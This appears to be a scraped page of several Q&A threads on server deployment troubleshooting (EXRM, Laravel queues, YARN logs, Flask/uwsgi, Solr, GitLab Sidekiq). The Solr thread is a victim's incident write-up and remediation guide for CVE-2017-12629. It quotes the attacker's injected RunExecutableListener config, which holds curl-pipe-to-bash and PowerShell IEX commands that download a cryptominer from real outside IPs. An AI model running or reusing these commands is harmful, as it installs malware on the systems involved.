Phoenix Deployment with EXRM - ubuntu-14.04

I am trying to deploy a Phoenix app on an Ubuntu server with EXRM.
The release runs perfectly and the website is accessible, but when I ping the release it says
Node 'myapp@myhost' not responding to pings.
vm.args file
## Name of the node
-sname pxblog
## Cookie for distributed erlang
-setcookie pxblog
## Heartbeat management; auto-restarts VM if it dies or becomes unresponsive
## (Disabled by default..use with caution!)
##-heart
## Enable kernel poll and a few async threads
##+K true
##+A 5
## Increase number of concurrent ports/sockets
##-env ERL_MAX_PORTS 4096
## Tweak GC to run more often
##-env ERL_FULLSWEEP_AFTER 10
Updated vm.args (Solved)
## Name of the node
-sname pxblog@localhost
## Cookie for distributed erlang
-setcookie pxblog
## Heartbeat management; auto-restarts VM if it dies or becomes unresponsive
## (Disabled by default..use with caution!)
##-heart
## Enable kernel poll and a few async threads
##+K true
##+A 5
## Increase number of concurrent ports/sockets
##-env ERL_MAX_PORTS 4096
## Tweak GC to run more often
##-env ERL_FULLSWEEP_AFTER 10

Check the vm.args file. Look for a line similar to this:
## Name of the node
-name test@127.0.0.1
I suspect the name you'll find there is "myapp@myhost". Try changing it to yourappname@localhost or yourappname@127.0.0.1. NB: I do not mean you should put the literal string yourappname there; substitute the name of your app.
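A quick way to verify, assuming an exrm-generated release named pxblog deployed under rel/pxblog (adjust the path to wherever your release actually lives): edit the deployed vm.args (or rebuild the release), restart it so the new node name takes effect, then ping it:
rel/pxblog/bin/pxblog restart
rel/pxblog/bin/pxblog ping    # should now answer "pong"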

Related

Laravel PHP queue:work not working on linux

I tried to use Supervisor and this is my config:
Status:
In my job table:
Also, the --tries=3 option is not working and my worker.log stays empty.
The jobs in your table are in the 'default' queue, but you've told your workers to only process jobs from the 'jobs' queue.
In the supervisor config, either remove --queue=jobs entirely or change it to --queue=default.
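For reference, a minimal sketch of the relevant Supervisor program block; the paths, user, and program name are assumptions, so adjust them to your project:
[program:laravel-worker]
command=php /var/www/yourapp/artisan queue:work --queue=default --tries=3
autostart=true
autorestart=true
numprocs=1
user=www-data
redirect_stderr=true
stdout_logfile=/var/www/yourapp/storage/logs/worker.log
After editing the config, reload it with supervisorctl reread followed by supervisorctl update, and the workers will pick up jobs from the default queue.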

Where is this log file?

Running a distributed application on Spark/YARN, I get the following error, which kills an executor and eventually the entire application:
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f4f85ab41b1, pid=3309, tid=0x00007f4f90a4e700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_112-b15) (build 1.8.0_112-b15)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.112-b15 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libSalience6.so+0x7631b1] lxaArrayTrie::Get(std::string const&) const+0x71
#
# Core dump written. Default location: /data/hadoop/yarn/local/usercache/koverse/appcache/application_1537930191769_0049/container_e08_1537930191769_0049_01_000016/core or core.3309
#
# An error report file with more information is saved as:
# /data/hadoop/yarn/local/usercache/koverse/appcache/application_1537930191769_0049/container_e08_1537930191769_0049_01_000016/hs_err_pid3309.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
There is a segmentation fault in libSalience6.so. So far so good!
But neither the core dump nor the log files are where they say they are.
This error occurred on slv004 of a cluster, so the yarn application directory
/data/hadoop/yarn/local/usercache/koverse/appcache/application_1537930191769_0049
exists on that node. But the container directory does not exist, and a find turns up no log files.
Any ideas where this log file might be?
You probably have log aggregation enabled. If that's the case, the log files are preserved in HDFS in TFile format.
You can check these logs using the Application History Server; its web UI is accessible on port 8188 by default.
Try this:
yarn logs -applicationId application_1537930191769_0049
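If your Hadoop version supports it, you can also narrow the output to the crashing container (the container ID is taken from the error report above) and save it locally; older releases may additionally require the -nodeAddress option:
yarn logs -applicationId application_1537930191769_0049 -containerId container_e08_1537930191769_0049_01_000016 > container_000016.log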

Deploying Flask APP with UWSGI, Nginx, direnv and systemd

I have created an API using Flask which I am trying to deploy on a Linux server by creating a systemd service.
I have used direnv to set up input parameters for the app, such as database connections. Below is what the file looks like:
The uwsgi config is as below:
The systemd file has the following entries:
I get the following error in my uwsgi logs whenever I try to reach the service from my browser:
--- no python application found, check your startup logs for errors ---
[pid: 23791|app: -1|req: -1/3] 192.168.9.180 () {44 vars in 719 bytes} [Thu Oct 11 14:35:09 2018] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (1 switches on core 0)
My understanding is that the ExecStart command in the systemd file is not able to see the variables set by direnv, hence I added the ExecStartPre entry, but even that does not seem to work.
Any hints/ideas are appreciated.
Note: the application is accessible without errors when I run uwsgi from the command line inside my Python virtual environment:
uwsgi --socket 0.0.0.0:5000 --protocol=http -w app:app
I have a few pieces of advice that may help you; probably only the first one is the one you actually need...
1) Either move all the env variables defined in direnv into the systemd unit as Environment= entries, or move them into a separate file (similar to the one you already have) without the "source activate" line and without the export keyword, and pass that file as EnvironmentFile= (see the unit sketch after this list). The documentation for that is here: https://www.freedesktop.org/software/systemd/man/systemd.exec.html#Environment
2) Your ExecStartPre does nothing useful: even though you cd into the path, that working directory is lost and not carried over to ExecStart. You should remove it.
3) By setting your PATH to only that one path you are restricting yourself; I would recommend looking at the value of your current PATH and setting it to that, or at least adding "/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin". Spoiler alert: you probably don't need to set it at all.
4) Put the socket under /run/<yourapp>/socket.socket and let systemd manage /run/<yourapp> for you with the RuntimeDirectory= directive.
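A minimal unit sketch combining points 1 and 4; the user, paths, env-file name, and app module are assumptions, so adjust them to your deployment:
[Unit]
Description=uWSGI instance serving the Flask API
After=network.target

[Service]
User=deploy
WorkingDirectory=/home/deploy/myapi
# KEY=value pairs previously exported by direnv, one per line, without the 'export' keyword
EnvironmentFile=/home/deploy/myapi/.env
# systemd creates and cleans up /run/myapi for the socket
RuntimeDirectory=myapi
ExecStart=/home/deploy/myapi/venv/bin/uwsgi --socket /run/myapi/myapi.socket -w app:app
Restart=on-failure

[Install]
WantedBy=multi-user.target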
good luck!

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
The site runs in Docker.
htop showed that all cores were loaded to 100% by a /var/tmp/sustes process owned by user 8983. I tried to find out what sustes is, but Google did not help; however, UID 8983 suggests the problem is in the Solr container.
I tried to update Solr from v6.x to 7.4 and got this message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
I rolled back to v6.6.4 (the only v6 available on Docker Hub: https://hub.docker.com/_/solr/), since the site had to keep working.
In the Docker logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we only need the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the contents of this file can also be viewed at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to start/stop it: https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container.
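If Solr runs in a container, a sketch of the same fix from the host; the container name solr-container is an assumption, use your own:
docker exec solr-container rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json
docker restart solr-container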
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and was fixed in v5.5.5, 6.6.2+ and 7.1+.
The attack was possible because http://example.com:8983 was freely accessible to anyone, so even though the exploit itself is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (i.e. next to solr.xml).
As Solr uses its own hash scheme (a sha256(password+salt) hash), a typical password hash cannot be used here. The easiest way to generate the hash that I've found is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
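Once the container is rebuilt and restarted with security.json in place, a quick sanity check from the host; solr/SolrRocks are the default credentials behind the hash used in the documentation example above, so replace them with your own:
curl http://127.0.0.1:8983/solr/admin/info/system                     # should now return 401
curl -u solr:SolrRocks http://127.0.0.1:8983/solr/admin/info/system   # should return 200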

GitLab/GitLab-CI Omnibus package configure sidekiq concurrency

My server has way too many Sidekiq processes running for my needs in my GitLab install; both GitLab and GitLab-CI were running a ton of them. I have it running on a DigitalOcean droplet (1 GB RAM, 20 GB SSD disk) with Ubuntu 14.04 x64. It regularly tells me I need to restart my server, and when I check htop I see 17-30 Sidekiq processes running gitlab-rails [0 of 25 busy].
There is no clear documentation on how to change the number of sidekiq processes, or the concurrency, for the Omnibus install of GitLab/GitLab-CI.
What is the best way to adjust this and have it persist through upgrades?
I still have a problem with the number of processes slowly growing over time, but the best solution I have come up with so far for limiting the concurrency setting is to alter these two files:
/opt/gitlab/embedded/service/gitlab-rails/config/initializers/4_sidekiq.rb
/opt/gitlab/embedded/service/gitlab-ci/config/initializers/3_sidekiq.rb
by adding config.options[:concurrency] = 2 inside the Sidekiq.configure_server do |config| block.
So, for example, my final 4_sidekiq.rb file looks like this:
# Custom Redis configuration
config_file = Rails.root.join('config', 'resque.yml')
resque_url = if File.exists?(config_file)
YAML.load_file(config_file)[Rails.env]
else
"redis://localhost:6379"
end
Sidekiq.configure_server do |config|
config.options[:concurrency] = 2
config.redis = {
url: resque_url,
namespace: 'resque:gitlab'
}
config.server_middleware do |chain|
chain.add Gitlab::SidekiqMiddleware::ArgumentsLogger if ENV['SIDEKIQ_LOG_ARGUMENTS']
chain.add Gitlab::SidekiqMiddleware::MemoryKiller if ENV['SIDEKIQ_MEMORY_KILLER_MAX_RSS']
end
end
Sidekiq.configure_client do |config|
config.redis = {
url: resque_url,
namespace: 'resque:gitlab'
}
end
At least for GitLab Omnibus we can do this easily in /etc/gitlab/gitlab.rb:
##################
# GitLab Sidekiq #
##################
# sidekiq['log_directory'] = "/var/log/gitlab/sidekiq"
# sidekiq['shutdown_timeout'] = 4
# sidekiq['concurrency'] = 25
sidekiq['concurrency'] = 5
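Then apply the change with the usual gitlab-ctl workflow:
sudo gitlab-ctl reconfigure
sudo gitlab-ctl restart sidekiq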
So now it says "[0 of 5 busy]"
Check out the hardware requirements for GitLab. Killing Sidekiq processes is a no-go; GitLab depends on them to perform a lot of async actions.
1 GB of memory is not enough!
